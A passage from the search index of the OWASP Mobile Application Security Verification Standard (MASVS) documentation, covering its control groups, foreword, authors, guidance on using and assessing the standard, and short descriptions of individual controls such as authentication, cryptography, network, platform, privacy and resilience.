"},{"location":"MASVS/09-MASVS-PLATFORM/","title":"MASVS-PLATFORM: Platform Interaction","text":"The security of mobile apps heavily depends on their interaction with the mobile platform, which often involves exposing data or functionality intentionally through the use of platform-provided inter-process communication (IPC) mechanisms and WebViews to enhance the user experience. However, these mechanisms can also be exploited by attackers or other installed apps, potentially compromising the app's security.
Furthermore, sensitive data, such as passwords, credit card details, and one-time passwords in notifications, is often displayed in the app's user interface. It is essential to ensure that this data is not unintentionally leaked through platform mechanisms such as auto-generated screenshots or accidental disclosure through shoulder surfing or device sharing.
This category comprises controls that ensure the app's interactions with the mobile platform occur securely. These controls cover the secure use of platform-provided IPC mechanisms, WebView configurations to prevent sensitive data leakage and functionality exposure, and secure display of sensitive data in the app's user interface. By implementing these controls, mobile app developers can safeguard sensitive user information and prevent unauthorized access by attackers.
"},{"location":"MASVS/10-MASVS-CODE/","title":"MASVS-CODE: Code Quality","text":"Mobile apps have many data entry points, including the UI, IPC, network, and file system, which might receive data that has been inadvertently modified by untrusted actors. By treating this data as untrusted input and properly verifying and sanitizing it before use, developers can prevent classical injection attacks, such as SQL injection, XSS, or insecure deserialization. However, other common coding vulnerabilities, such as memory corruption flaws, are hard to detect in penetration testing but easy to prevent with secure architecture and coding practices. Developers should follow best practices such as the OWASP Software Assurance Maturity Model (SAMM) and NIST.SP.800-218 Secure Software Development Framework (SSDF) to avoid introducing these flaws in the first place.
This category covers coding vulnerabilities that arise from external sources such as app data entry points, the OS, and third-party software components. Developers should verify and sanitize all incoming data to prevent injection attacks and bypass of security checks. They should also enforce app updates and ensure that the app runs up-to-date platforms to protect users from known vulnerabilities.
"},{"location":"MASVS/11-MASVS-RESILIENCE/","title":"MASVS-RESILIENCE: Resilience Against Reverse Engineering and Tampering","text":"Defense-in-depth measures such as code obfuscation, anti-debugging, anti-tampering, etc. are important to increase app resilience against reverse engineering and specific client-side attacks. They add multiple layers of security controls to the app, making it more difficult for attackers to successfully reverse engineer and extract valuable intellectual property or sensitive data from it, which could result in:
The controls in this category aim to ensure that the app is running on a trusted platform, prevent tampering at runtime and ensure the integrity of the app's intended functionality. Additionally, the controls impede comprehension by making it difficult to figure out how the app works using static analysis and prevent dynamic analysis and instrumentation that could allow an attacker to modify the code at runtime.
However, note that the lack of any of these measures does not necessarily cause vulnerabilities - instead, they add threat-specific additional protection to apps which must also fulfil the rest of the OWASP MASVS security controls according to their specific threat models.
"},{"location":"MASVS/12-MASVS-PRIVACY/","title":"MASVS-PRIVACY: Privacy","text":"The main goal of MASVS-PRIVACY is to provide a baseline for user privacy. It is not intended to cover all aspects of user privacy, especially when other standards and regulations such as ENISA or the GDPR already do that. We focus on the app itself, looking at what can be tested using information that's publicly available or found within the app through methods like static or dynamic analysis.
While some associated tests can be automated, others necessitate manual intervention due to the nuanced nature of privacy. For example, if an app collects data that it didn't mention in the app store or its privacy policy, it takes careful manual checking to spot this.
Note on \"Data Collection and Sharing\":For the MASTG tests, we treat \"Collect\" and \"Share\" in a unified manner. This means that whether the app is sending data to another server or transferring it to another app on the device, we view it as data that's potentially leaving the user's control. Validating what happens to the data on remote endpoints is challenging and often not feasible due to access restrictions and the dynamic nature of server-side operations. Therefore, this issue is outside of the scope of the MASVS.
IMPORTANT DISCLAIMER:
MASVS-PRIVACY is not intended to serve as an exhaustive or exclusive reference. While it provides valuable guidance on app-centric privacy considerations, it should never replace comprehensive assessments, such as a Data Protection Impact Assessment (DPIA) mandated by the General Data Protection Regulation (GDPR) or other pertinent legal and regulatory frameworks. Stakeholders are strongly advised to undertake a holistic approach to privacy, integrating MASVS-PRIVACY insights with broader assessments to ensure comprehensive data protection compliance. Given the specialized nature of privacy regulations and the complexity of data protection, these assessments are best conducted by privacy experts rather than security experts.
"},{"location":"MASVS/CHANGELOG/","title":"Changelog","text":""},{"location":"MASVS/CHANGELOG/#v131-and-newer","title":"V1.3.1 and newer","text":"All our Changelogs are available online at the OWASP MASVS GitHub repository, see the Releases page.
"},{"location":"MASVS/CHANGELOG/#v13-13-may-2021","title":"V1.3 - 13 May 2021","text":"We are proud to announce the introduction of a new document build pipeline, which is a major milestone for our project. The build pipeline is based on Pandocker and Github Actions. This significantly reduces the time spent on creating new releases and will also be the foundation for the OWASP MSTG and will be made available for the OWASP ASVS project.
"},{"location":"MASVS/CHANGELOG/#changes","title":"Changes","text":"The following changes are part of release 1.2:
The following changes are part of pre-release 1.2:
The following changes are part of release 1.1.4:
The following changes are part of release 1.1.2:
The following changes are part of release 1.1:
The following changes are part of release 1.0:
Technological revolutions can happen quickly. Less than a decade ago, smartphones were clunky devices with little keyboards - expensive playthings for tech-savvy business users. Today, smartphones are an essential part of our lives. We've come to rely on them for information, navigation and communication, and they are ubiquitous both in business and in our social lives.
Every new technology introduces new security risks, and keeping up with those changes is one of the main challenges the security industry faces. The defensive side is always a few steps behind. For example, the default reflex for many was to apply old ways of doing things: Smartphones are like small computers, and mobile apps are just like classic software, so surely the security requirements are similar? But it doesn't work like that. Smartphone operating systems are different from desktop operating systems, and mobile apps are different from web apps. For example, the classical method of signature-based virus scanning doesn't make sense in modern mobile OS environments: Not only is it incompatible with the mobile app distribution model, it's also technically impossible due to sandboxing restrictions. Also, some vulnerability classes, such as buffer overflows and XSS issues, are less relevant in the context of run-of-the-mill mobile apps than in, say, desktop apps and web applications (exceptions apply).
Over time, our industry has gotten a better grip on the mobile threat landscape. As it turns out, mobile security is all about data protection: Apps store our personal information, pictures, recordings, notes, account data, business information, location and much more. They act as clients that connect us to services we use on a daily basis, and as communications hubs that process each and every message we exchange with others. Compromise a person's smartphone and you get unfiltered access to that person's life. When we consider that mobile devices are more readily lost or stolen and mobile malware is on the rise, the need for data protection becomes even more apparent.
A security standard for mobile apps must therefore focus on how mobile apps handle, store and protect sensitive information. Even though modern mobile operating systems like iOS and Android offer mature APIs for secure data storage and communication, those have to be implemented and used correctly in order to be effective. Data storage, inter-app communication, proper usage of cryptographic APIs and secure network communication are only some of the aspects that require careful consideration.
An important question in need of industry consensus is how far exactly one should go in protecting the confidentiality and integrity of data. For example, most of us would agree that a mobile app should verify the server certificate in a TLS exchange. But what about certificate or public key pinning? Does not doing it result in a vulnerability? Should this be a requirement if an app handles sensitive data, or is it maybe even counter-productive? Do we need to encrypt data stored in SQLite databases, even though the OS sandboxes the app? What is appropriate for one app might be unrealistic for another. The MASVS is an attempt to standardize these requirements using profiles that fit different threat scenarios.
Furthermore, the appearance of root malware and remote administration tools has created awareness of the fact that mobile operating systems themselves have exploitable flaws, so containerization strategies are increasingly used to afford additional protection to sensitive data and prevent client-side tampering. This is where things get complicated. Hardware-backed security features and OS-level containerization solutions, such as Android Enterprise and Samsung Knox, do exist, but they aren't consistently available across different devices. As a band-aid, it is possible to implement software-based protection measures - but unfortunately, there are no standards or testing processes for verifying these kinds of protections.
As a result, mobile app security testing reports are all over the place: For example, some testers report a lack of obfuscation or root detection in an Android app as \u201csecurity flaw\u201d. On the other hand, measures like string encryption, debugger detection or control flow obfuscation aren't considered mandatory. However, this binary way of looking at things doesn't make sense because resilience is not a binary proposition: It depends on the particular client-side threats one aims to defend against. Software protections are not useless, but they can ultimately be bypassed, so they must never be used as a replacement for security controls.
The overall goal of the MASVS is to offer a baseline for mobile application security, while also allowing for the inclusion of defense-in-depth measures and protections against client-side threats. The MASVS is meant to achieve the following:
We are aware that 100% industry consensus is impossible to achieve. Nevertheless, we hope that the MASVS is useful in providing guidance throughout all phases of mobile app development and testing. As an open source standard, the MASVS will evolve over time, and we welcome any contributions and suggestions.
By Bernhard Mueller
"},{"location":"MASVS/Intro/02-Frontispiece/","title":"About the Standard","text":"The OWASP Mobile Application Security Verification Standard (MASVS) is the industry standard for mobile application security. It provides a comprehensive set of security controls that can be used to assess the security of mobile apps across various platforms (e.g., Android, iOS) and deployment scenarios (e.g., consumer, enterprise). The standard covers the key components of the mobile app attack surface including storage, cryptography, authentication and authorization, network communication, interaction with the mobile platform, code quality and resilience against reverse engineering and tampering.
The OWASP MASVS is the result of years of community effort and industry feedback. We thank all the contributors who have helped shape this standard. We welcome your feedback on the OWASP MASVS at any time, especially as you apply it to your own organization and mobile app development projects. Getting inputs from a variety of mobile app developers will help us improve and update the standard which is revised periodically based on your inputs and feedback.
You can provide feedback using GitHub Discussions in the OWASP MASVS repo https://github.com/OWASP/owasp-masvs/discussions, or contact the project leads directly https://mas.owasp.org/contact/.
The OWASP MASVS and MASTG are trusted by the following platform providers and standardization, governmental and educational institutions. Learn more.
"},{"location":"MASVS/Intro/02-Frontispiece/#authors","title":"Authors","text":""},{"location":"MASVS/Intro/02-Frontispiece/#sven-schleier","title":"Sven Schleier","text":"
Sven is specialised in penetration testing and application security and has guided numerous projects to build security in from the start. He strongly believes in knowledge sharing and is speaking worldwide at meetups and conferences, is an adjunct professor and is conducting hands-on workshops about mobile app security to penetration testers, developers and students.
"},{"location":"MASVS/Intro/02-Frontispiece/#carlos-holguera","title":"Carlos Holguera","text":"Carlos is a mobile security research engineer with many years of hands-on experience in security testing for mobile apps and embedded systems such as automotive control units and IoT devices. He is passionate about reverse engineering and dynamic instrumentation of mobile apps and is continuously learning and sharing his knowledge.
"},{"location":"MASVS/Intro/02-Frontispiece/#jeroen-beckers","title":"Jeroen Beckers","text":"Jeroen is a mobile security lead responsible for quality assurance on mobile security projects and for R&D on all things mobile. Ever since his master's thesis on Android security, Jeroen has been interested in mobile devices and their (in)security. He loves sharing his knowledge with other people, as is demonstrated by his many talks & trainings at colleges, universities, clients and conferences.
"},{"location":"MASVS/Intro/02-Frontispiece/#bernhard-mueller","title":"Bernhard Mueller","text":"Bernhard is a cyber security specialist with a talent for hacking systems of all kinds. During more than a decade in the industry, he has published many zero-day exploits for software. BlackHat USA commended his pioneering work in mobile security with a Pwnie Award for Best Research.
"},{"location":"MASVS/Intro/02-Frontispiece/#jeroen-willemsen","title":"Jeroen Willemsen","text":"Jeroen is a principal security architect with a passion for mobile security and risk management. He has supported companies as a security coach, a security engineer and as a full-stack developer. He loves explaining technical subjects: from security issues to programming challenges.
"},{"location":"MASVS/Intro/02-Frontispiece/#contributors","title":"Contributors","text":"All of our contributors are listed in the Contributing section of the OWASP MAS website:
https://mas.owasp.org/contributing/
"},{"location":"MASVS/Intro/02-Frontispiece/#donators","title":"Donators","text":"While both the MASVS and the MASTG are created and maintained by the community on a voluntary basis, sometimes outside help is required. We therefore thank our donators for providing the funds to be able to hire technical editors. Note that their donation does not influence the content of the MASVS or MASTG in any way. The Donation Packages are described on the OWASP MAS Website.
"},{"location":"MASVS/Intro/02-Frontispiece/#changelog","title":"Changelog","text":"All our Changelogs are available online at the OWASP MASVS GitHub repository, see the Releases page:
https://github.com/OWASP/owasp-masvs/releases
"},{"location":"MASVS/Intro/02-Frontispiece/#copyright-and-license","title":"Copyright and License","text":"Copyright \u00a9 The OWASP Foundation. This work is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License. For any reuse or distribution, you must make clear to others the license terms of this work.
"},{"location":"MASVS/Intro/03-Using_the_MASVS/","title":"The Mobile Application Security Verification Standard","text":"The Mobile Application Security Verification Standard (MASVS) is a comprehensive security standard developed by the Open Worldwide Application Security Project (OWASP). This framework provides a clear and concise set of guidelines and best practices for assessing and enhancing the security of mobile applications. The MASVS is designed to be used as a metric, guidance, and baseline for mobile app security verification, serving as a valuable resource for developers, application owners, and security professionals.
The objective of the MASVS is to establish a high level of confidence in the security of mobile apps by providing a set of controls that address the most common mobile application security issues. These controls were developed with a focus on providing guidance during all phases of mobile app development and testing, and to be used as a baseline for mobile app security verification during procurement.
By adhering to the controls outlined in the OWASP MASVS, organizations can ensure that their mobile applications are built with security in mind, reducing the risk of security breaches and protecting sensitive user data. Whether used as a metric, guidance, or baseline, the OWASP MASVS is an invaluable tool for enhancing the security of mobile applications.
The OWASP MASVS is a living document and is regularly updated to reflect the changing threat landscape and new attack vectors. As such, it's important to stay up-to-date with the latest version of the standard and adapt security measures accordingly.
"},{"location":"MASVS/Intro/03-Using_the_MASVS/#mobile-application-security-model","title":"Mobile Application Security Model","text":"The standard is divided into various groups that represent the most critical areas of the mobile attack surface. These control groups, labeled MASVS-XXXXX, provide guidance and standards for the following areas:
Each of these control groups contains individual controls labeled MASVS-XXXXX-Y, which provide specific guidance on the particular security measures that need to be implemented to meet the standard.
"},{"location":"MASVS/Intro/03-Using_the_MASVS/#mas-testing-profiles","title":"MAS Testing Profiles","text":"The MAS project has traditionally provided three verification levels (L1, L2 and R), which were revisited during the MASVS refactoring in 2023, and have been reworked as \"MAS Testing Profiles\" and moved over to the OWASP MASTG. These profiles are now aligned with the NIST OSCAL (Open Security Controls Assessment Language) standard, which is a comprehensive catalog of security controls that can be used to secure information systems.
By aligning with OSCAL, the MASVS provides a more flexible and comprehensive approach to security testing. OSCAL provides a standard format for security control information, which allows for easier sharing and reuse of security controls across different systems and organizations. This allows for a more efficient use of resources and a more targeted approach to mobile app security testing.
However, it is important to note that implementing these profiles fully or partially should be a risk-based decision made in consultation with business owners. The profiles should be tailored to the specific security risks and requirements of the mobile application being developed, and any deviations from the recommended controls should be carefully justified and documented.
"},{"location":"MASVS/Intro/03-Using_the_MASVS/#assumptions","title":"Assumptions","text":"When using the MASVS, it's important to keep in mind the following assumptions:
While the OWASP MASVS is an invaluable tool for enhancing the security of mobile applications, it cannot guarantee absolute security. It should be used as a baseline for security requirements, but additional security measures should also be implemented as appropriate to address specific risks and threats to the mobile app.
"},{"location":"MASVS/Intro/03-Using_the_MASVS/#security-architecture-design-and-threat-modeling-for-mobile-apps","title":"Security Architecture, Design and Threat Modeling for Mobile Apps","text":"The OWASP MASVS assumes that best practices for secure architecture, design, and threat modeling have been followed as a foundation.
Security must be a top priority throughout all stages of mobile app development, from the initial planning and design phase to deployment and ongoing maintenance. Developers need to follow secure development best practices and ensure that security measures are prioritized to protect sensitive data, comply with policies and regulations, and identify and address security issues that can be targeted by attackers.
While the MASVS and MASTG focus on controls and technical test cases for app security assessments, non-technical aspects such as following best practices laid out by OWASP Software Assurance Maturity Model (SAMM) or NIST.SP.800-218 Secure Software Development Framework (SSDF) for secure architecture, design, and threat modeling are still important. The MASVS can also be used as reference and input for a threat model to raise awareness of potential attacks.
To ensure that these practices are followed, developers can provide documentation or evidence of adherence to these standards, such as design documents, threat models, and security architecture diagrams. Additionally, interviews can be conducted to collect information on adherence to these practices and provide an understanding of the level of compliance with these standards.
"},{"location":"MASVS/Intro/03-Using_the_MASVS/#secure-app-ecosystem","title":"Secure App Ecosystem","text":"The OWASP MASVS assumes other relevant security standards are also leveraged to ensure that all systems involved in the app's operation meet their applicable requirements.
Mobile apps often interact with multiple systems, including backend servers, third-party APIs, Bluetooth devices, cars, IoT devices, and more. Each of these systems may introduce their own security risks that must be considered as part of the mobile app's security design and threat modeling. For example, when interacting with a backend server, the OWASP Application Security Verification Standard (ASVS) should be used to ensure that the server is secure and meets the required security standards. In the case of Bluetooth devices, the app should be designed to prevent unauthorized access, while for cars, the app should be designed to protect the user's data and ensure that there are no safety issues with the car's operation.
"},{"location":"MASVS/Intro/03-Using_the_MASVS/#security-knowledge-and-expertise","title":"Security Knowledge and Expertise","text":"The OWASP MASVS assumes a certain level of security knowledge and expertise among developers and security professionals using the standard. It's important to have a good understanding of mobile app security concepts, as well as the relevant tools and techniques used for mobile app security testing and assessment. To support this, the OWASP MAS project also provides the OWASP Mobile Application Security Testing Guide (MASTG), which provides in-depth guidance on mobile app security testing and assessment.
Mobile app development is a rapidly evolving field, with new technologies, programming languages, and frameworks constantly emerging. It's essential for developers and security professionals to stay current with these developments, as well as to have a solid foundation in fundamental security principles.
OWASP SAMM provides a dedicated \"Education & Guidance\" domain which aims to ensure that all stakeholders involved in the software development lifecycle are aware of the software security risks and are equipped with the knowledge and skills to mitigate these risks. This includes developers, testers, architects, project managers, executives, and other personnel involved in software development and deployment.
"},{"location":"MASVS/Intro/03-Using_the_MASVS/#applicability-of-the-masvs","title":"Applicability of the MASVS","text":"By adhering to the MASVS, businesses and developers can ensure that their mobile apps are secure and meet industry-standard security requirements, regardless of the development approach used. This is the case for downloadable apps, as the project was traditionally focused on, but the MAS resources and guidelines are also applicable to other areas of the business such as preloaded applications and SDKs.
"},{"location":"MASVS/Intro/03-Using_the_MASVS/#native-apps","title":"Native Apps","text":"Native apps are written in platform-specific languages, such as Java/Kotlin for Android or Objective-C/Swift for iOS.
"},{"location":"MASVS/Intro/03-Using_the_MASVS/#cross-platform-and-hybrid-apps","title":"Cross-Platform and Hybrid Apps","text":"Apps based on cross-platform (Flutter, React Native, Xamarin, Ionic, etc.) and hybrid (Cordova, PhoneGap, Framework7, Onsen UI, etc.) frameworks may be susceptible to platform-specific vulnerabilities that don't exist in native apps. For example, some JavaScript frameworks may introduce new security issues that don't exist in other programming languages. It is therefore essential to follow the security best practices of the used frameworks.
The MASVS is agnostic to the type of mobile application being developed. This means that the guidelines and best practices outlined in the MASVS can be applied to all types of mobile apps, including cross-platform and hybrid apps.
"},{"location":"MASVS/Intro/03-Using_the_MASVS/#preloads","title":"Preloads","text":"Preloaded apps are apps that are installed on a user's device at factory time and may have elevated privileges that leave users vulnerable to exploitative business practices. Given the large number of preloaded apps on an average user's device, it's important to measure their risk in a quantifiable way.
There are hundreds of preloads that may ship on a device, and as a result, automation is critical. A subset of MAS criteria that is automation-friendly may be a good basis.
"},{"location":"MASVS/Intro/03-Using_the_MASVS/#sdks","title":"SDKs","text":"SDKs play a vital role in the mobile app value chain, supplying code developers need to build faster, smarter, and more profitably. Developers rely on them heavily, with the average mobile app using 30 SDKs, and 90% of code sourced from third parties. While this widespread use delivers significant benefits to developers, it also propagates safety and security issues.
SDKs offer a variety of functionality, and should be regarded as an individual project. You should evaluate how the MASVS applies to the used SDKs to ensure the highest possible security testing coverage.
"},{"location":"MASVS/Intro/04-Assessment_and_Certification/","title":"Assessment and Certification","text":""},{"location":"MASVS/Intro/04-Assessment_and_Certification/#owasps-stance-on-masvs-certifications-and-trust-marks","title":"OWASP's Stance on MASVS Certifications and Trust Marks","text":"OWASP, as a vendor-neutral not-for-profit organization, does not certify any vendors, verifiers or software.
All such assurance assertions, trust marks, or certifications are not officially vetted, registered, or certified by OWASP, so an organization relying upon such a view needs to be cautious of the trust placed in any third party or trust mark claiming (M)ASVS certification.
This should not inhibit organizations from offering such assurance services, as long as they do not claim official OWASP certification.
"},{"location":"MASVS/Intro/04-Assessment_and_Certification/#guidance-for-certifying-mobile-apps","title":"Guidance for Certifying Mobile Apps","text":"The recommended way of verifying compliance of a mobile app with the MASVS is by performing an \"open book\" review, meaning that the testers are granted access to key resources such as architects and developers of the app, project documentation, source code, and authenticated access to endpoints, including access to at least one user account for each role.
It is important to note that the MASVS only covers the security of the mobile app (client-side). It does not contain specific controls for the remote endpoints (e.g. web services) associated with the app and they should be verified against appropriate standards, such as the OWASP ASVS.
A certifying organization must include in any report the scope of the verification (particularly if a key component is out of scope), a summary of verification findings, including passed and failed tests, with clear indications of how to resolve the failed tests. Keeping detailed work papers, screenshots or recordings, scripts to reliably and repeatedly exploit an issue, and electronic records of testing, such as intercepting proxy logs and associated notes such as a cleanup list, is considered standard industry practice. It is not sufficient to simply run a tool and report on the failures; this does not provide sufficient evidence that all issues at a certifying level have been tested and tested thoroughly. In case of dispute, there should be sufficient supportive evidence to demonstrate that every verified control has indeed been tested.
"},{"location":"MASVS/Intro/04-Assessment_and_Certification/#using-the-owasp-mobile-application-security-testing-guide-mastg","title":"Using the OWASP Mobile Application Security Testing Guide (MASTG)","text":"The OWASP MASTG is a manual for testing the security of mobile apps. It describes the technical processes for verifying the controls listed in the MASVS. The MASTG includes a list of test cases, each of which map to a control in the MASVS. While the MASVS controls are high-level and generic, the MASTG provides in-depth recommendations and testing procedures on a per-mobile-OS basis.
Testing the app's remote endpoints is not covered in the MASTG. For example:
The use of source code scanners and black-box testing tools is encouraged in order to increase efficiency whenever possible. It is however not possible to complete MASVS verification using automated tools alone, since every mobile app is different. In order to fully verify the security of the app it is essential to understand the overall architecture, business logic, and technical pitfalls of the specific technologies and frameworks being used.
"},{"location":"MASVS/Intro/04-Assessment_and_Certification/#other-uses","title":"Other Uses","text":""},{"location":"MASVS/Intro/04-Assessment_and_Certification/#as-detailed-security-architecture-guidance","title":"As Detailed Security Architecture Guidance","text":"One of the more common uses for the Mobile Application Security Verification Standard is as a resource for security architects. The two major security architecture frameworks, SABSA or TOGAF, are missing a great deal of information that is necessary to complete mobile application security architecture reviews. MASVS can be used to fill in those gaps by allowing security architects to choose better controls for issues common to mobile apps.
"},{"location":"MASVS/Intro/04-Assessment_and_Certification/#as-a-replacement-for-off-the-shelf-secure-coding-checklists","title":"As a Replacement for Off-the-shelf Secure Coding Checklists","text":"Many organizations can benefit from adopting the MASVS, by choosing one of the two levels, or by forking MASVS and changing what is required for each application's risk level in a domain-specific way. We encourage this type of forking as long as traceability is maintained, so that if an app has passed control 4.1, this means the same thing for forked copies as the standard evolves.
"},{"location":"MASVS/Intro/04-Assessment_and_Certification/#as-a-basis-for-security-testing-methodologies","title":"As a Basis for Security Testing Methodologies","text":"A good mobile app security testing methodology should cover all controls listed in the MASVS. The OWASP Mobile Application Security Testing Guide (MASTG) describes black-box and white-box test cases for each verification control.
"},{"location":"MASVS/Intro/04-Assessment_and_Certification/#as-a-guide-for-automated-unit-and-integration-tests","title":"As a Guide for Automated Unit and Integration Tests","text":"The MASVS is designed to be highly testable, with the sole exception of architectural controls. Automated unit, integration and acceptance testing based on the MASVS controls can be integrated in the continuous development lifecycle. This not only increases developer security awareness, but also improves the overall quality of the resulting apps, and reduces the amount of findings during security testing in the pre-release phase.
"},{"location":"MASVS/Intro/04-Assessment_and_Certification/#for-secure-development-training","title":"For Secure Development Training","text":"MASVS can also be used to define characteristics of secure mobile apps. Many \"secure coding\" courses are simply ethical hacking courses with a light smear of coding tips. This does not help developers. Instead, secure development courses can use the MASVS, with a strong focus on the proactive controls documented in the MASVS, rather than e.g. the Top 10 code security issues.
"},{"location":"MASVS/controls/MASVS-AUTH-1/","title":"MASVS-AUTH-1","text":"The app uses secure authentication and authorization protocols and follows the relevant best practices.
Most apps connecting to a remote endpoint require user authentication and also enforce some kind of authorization. While the enforcement of these mechanisms must be on the remote endpoint, the apps also have to ensure that it follows all the relevant best practices to ensure a secure use of the involved protocols.
"},{"location":"MASVS/controls/MASVS-AUTH-2/","title":"MASVS-AUTH-2","text":"The app performs local authentication securely according to the platform best practices.
Many apps allow users to authenticate via biometrics or a local PIN code. These authentication mechanisms need to be correctly implemented. Additionally, some apps might not have a remote endpoint, and rely fully on local app authentication.
"},{"location":"MASVS/controls/MASVS-AUTH-3/","title":"MASVS-AUTH-3","text":"The app secures sensitive operations with additional authentication.
Some additional form of authentication is often desirable for sensitive actions inside the app. This can be done in different ways (biometric, pin, MFA code generator, email, deep links, etc) and they all need to be implemented securely.
"},{"location":"MASVS/controls/MASVS-CODE-1/","title":"MASVS-CODE-1","text":"The app requires an up-to-date platform version.
Every release of the mobile OS includes security patches and new security features. By supporting older versions, apps stay vulnerable to well-known threats. This control ensures that the app is running on an up-to-date platform version so that users have the latest security protections.
"},{"location":"MASVS/controls/MASVS-CODE-2/","title":"MASVS-CODE-2","text":"The app has a mechanism for enforcing app updates.
Sometimes critical vulnerabilities are discovered in the app when it is already in production. This control ensures that there is a mechanism to force the users to update the app before they can continue using it.
"},{"location":"MASVS/controls/MASVS-CODE-3/","title":"MASVS-CODE-3","text":"The app only uses software components without known vulnerabilities.
To be truly secure, a full whitebox assessment should have been performed on all app components. However, as often happens with e.g. third-party components, this is not always feasible and not typically part of a penetration test. This control covers \"low-hanging fruit\" cases, such as those that can be detected just by scanning libraries for known vulnerabilities.
"},{"location":"MASVS/controls/MASVS-CODE-4/","title":"MASVS-CODE-4","text":"The app validates and sanitizes all untrusted inputs.
Apps have many data entry points including the UI, IPC, the network, the file system, etc. This incoming data might have been inadvertently modified by untrusted actors and may lead to bypass of critical security checks as well as classical injection attacks such as SQL injection, XSS or insecure deserialization. This control ensures that this data is treated as untrusted input and is properly verified and sanitized before it's used.
"},{"location":"MASVS/controls/MASVS-CRYPTO-1/","title":"MASVS-CRYPTO-1","text":"The app employs current strong cryptography and uses it according to industry best practices.
Cryptography plays an especially important role in securing the user's data - even more so in a mobile environment, where attackers having physical access to the user's device is a likely scenario. This control covers general cryptography best practices, which are typically defined in external standards.
"},{"location":"MASVS/controls/MASVS-CRYPTO-2/","title":"MASVS-CRYPTO-2","text":"The app performs key management according to industry best practices.
Even the strongest cryptography would be compromised by poor key management. This control covers the management of cryptographic keys throughout their lifecycle, including key generation, storage and protection.
"},{"location":"MASVS/controls/MASVS-NETWORK-1/","title":"MASVS-NETWORK-1","text":"The app secures all network traffic according to the current best practices.
Ensuring data privacy and integrity of any data in transit is critical for any app that communicates over the network. This is typically done by encrypting data and authenticating the remote endpoint, as TLS does. However, there are many ways for a developer to disable the platform secure defaults, or bypass them completely by using low-level APIs or third-party libraries. This control ensures that the app is in fact setting up secure connections in any situation.
"},{"location":"MASVS/controls/MASVS-NETWORK-2/","title":"MASVS-NETWORK-2","text":"The app performs identity pinning for all remote endpoints under the developer's control.
Instead of trusting all the default root CAs of the framework or device, this control will make sure that only very specific CAs are trusted. This practice is typically called certificate pinning or public key pinning.
"},{"location":"MASVS/controls/MASVS-PLATFORM-1/","title":"MASVS-PLATFORM-1","text":"The app uses IPC mechanisms securely.
Apps typically use platform provided IPC mechanisms to intentionally expose data or functionality. Both installed apps and the user are able to interact with the app in many different ways. This control ensures that all interactions involving IPC mechanisms happen securely.
"},{"location":"MASVS/controls/MASVS-PLATFORM-2/","title":"MASVS-PLATFORM-2","text":"The app uses WebViews securely.
WebViews are typically used by apps that have a need for increased control over the UI. This control ensures that WebViews are configured securely to prevent sensitive data leakage as well as sensitive functionality exposure (e.g. via JavaScript bridges to native code).
"},{"location":"MASVS/controls/MASVS-PLATFORM-3/","title":"MASVS-PLATFORM-3","text":"The app uses the user interface securely.
Sensitive data has to be displayed in the UI in many situations (e.g. passwords, credit card details, OTP codes in notifications). This control ensures that this data doesn't end up being unintentionally leaked due to platform mechanisms such as auto-generated screenshots or accidentally disclosed via e.g. shoulder surfing or sharing the device with another person.
"},{"location":"MASVS/controls/MASVS-PRIVACY-1/","title":"MASVS-PRIVACY-1","text":"The app minimizes access to sensitive data and resources.
Apps should only request access to the data they absolutely need for their functionality and always with informed consent from the user. This control ensures that apps practice data minimization and restricts access control, reducing the potential impact of data breaches or leaks.
Furthermore, apps should share data with third parties only when necessary, and this should include enforcing that third-party SDKs operate based on user consent, not by default or without it. Apps should prevent third-party SDKs from ignoring consent signals or from collecting data before consent is confirmed.
Additionally, apps should be aware of the 'supply chain' of SDKs they incorporate, ensuring that no data is unnecessarily passed down their chain of dependencies. This end-to-end responsibility for data aligns with recent SBOM regulatory requirements, making apps more accountable for their data practices.
"},{"location":"MASVS/controls/MASVS-PRIVACY-2/","title":"MASVS-PRIVACY-2","text":"The app prevents identification of the user.
Protecting user identity is crucial. This control emphasizes the use of unlinkability techniques like data abstraction, anonymization and pseudonymization to prevent user identification and tracking.
Another key aspect addressed by this control is to establish technical barriers when employing complex 'fingerprint-like' signals (e.g. device IDs, IP addresses, behavioral patterns) for specific purposes. For instance, a fingerprint used for fraud detection should be isolated and not repurposed for audience measurement in an analytics SDK. This ensures that each data stream serves its intended function without risking user privacy.
"},{"location":"MASVS/controls/MASVS-PRIVACY-3/","title":"MASVS-PRIVACY-3","text":"The app is transparent about data collection and usage.
Users have the right to know how their data is being used. This control ensures that apps provide clear information about data collection, storage, and sharing practices, including any behavior a user wouldn't reasonably expect, such as background data collection. Apps should also adhere to platform guidelines on data declarations.
"},{"location":"MASVS/controls/MASVS-PRIVACY-4/","title":"MASVS-PRIVACY-4","text":"The app offers user control over their data.
Users should have control over their data. This control ensures that apps provide mechanisms for users to manage, delete, and modify their data, and change privacy settings as needed (e.g. to revoke consent). Additionally, apps should re-prompt for consent and update their transparency disclosures when they require more data than initially specified.
"},{"location":"MASVS/controls/MASVS-RESILIENCE-1/","title":"MASVS-RESILIENCE-1","text":"The app validates the integrity of the platform.
Running on a platform that has been tampered with can be very dangerous for apps, as this may disable certain security features, putting the data of the app at risk. Trusting the platform is essential for many of the MASVS controls relying on the platform being secure (e.g. secure storage, biometrics, sandboxing, etc.). This control tries to validate that the OS has not been compromised and its security features can thus be trusted.
"},{"location":"MASVS/controls/MASVS-RESILIENCE-2/","title":"MASVS-RESILIENCE-2","text":"The app implements anti-tampering mechanisms.
Apps run on a user-controlled device, and without proper protections it's relatively easy to run a modified version locally (e.g. to cheat in a game, or enable premium features without paying), or upload a backdoored version of it to third-party app stores. This control tries to ensure the integrity of the app's intended functionality by preventing modifications to the original code and resources.
"},{"location":"MASVS/controls/MASVS-RESILIENCE-3/","title":"MASVS-RESILIENCE-3","text":"The app implements anti-static analysis mechanisms.
Understanding the internals of an app is typically the first step towards tampering with it (either dynamically, or statically). This control tries to impede comprehension by making it as difficult as possible to figure out how an app works using static analysis.
"},{"location":"MASVS/controls/MASVS-RESILIENCE-4/","title":"MASVS-RESILIENCE-4","text":"The app implements anti-dynamic analysis techniques.
Sometimes pure static analysis is very difficult and time consuming so it typically goes hand in hand with dynamic analysis. Observing and manipulating an app during runtime makes it much easier to decipher its behavior. This control aims to make it as difficult as possible to perform dynamic analysis, as well as prevent dynamic instrumentation which could allow an attacker to modify the code at runtime.
"},{"location":"MASVS/controls/MASVS-STORAGE-1/","title":"MASVS-STORAGE-1","text":"The app securely stores sensitive data.
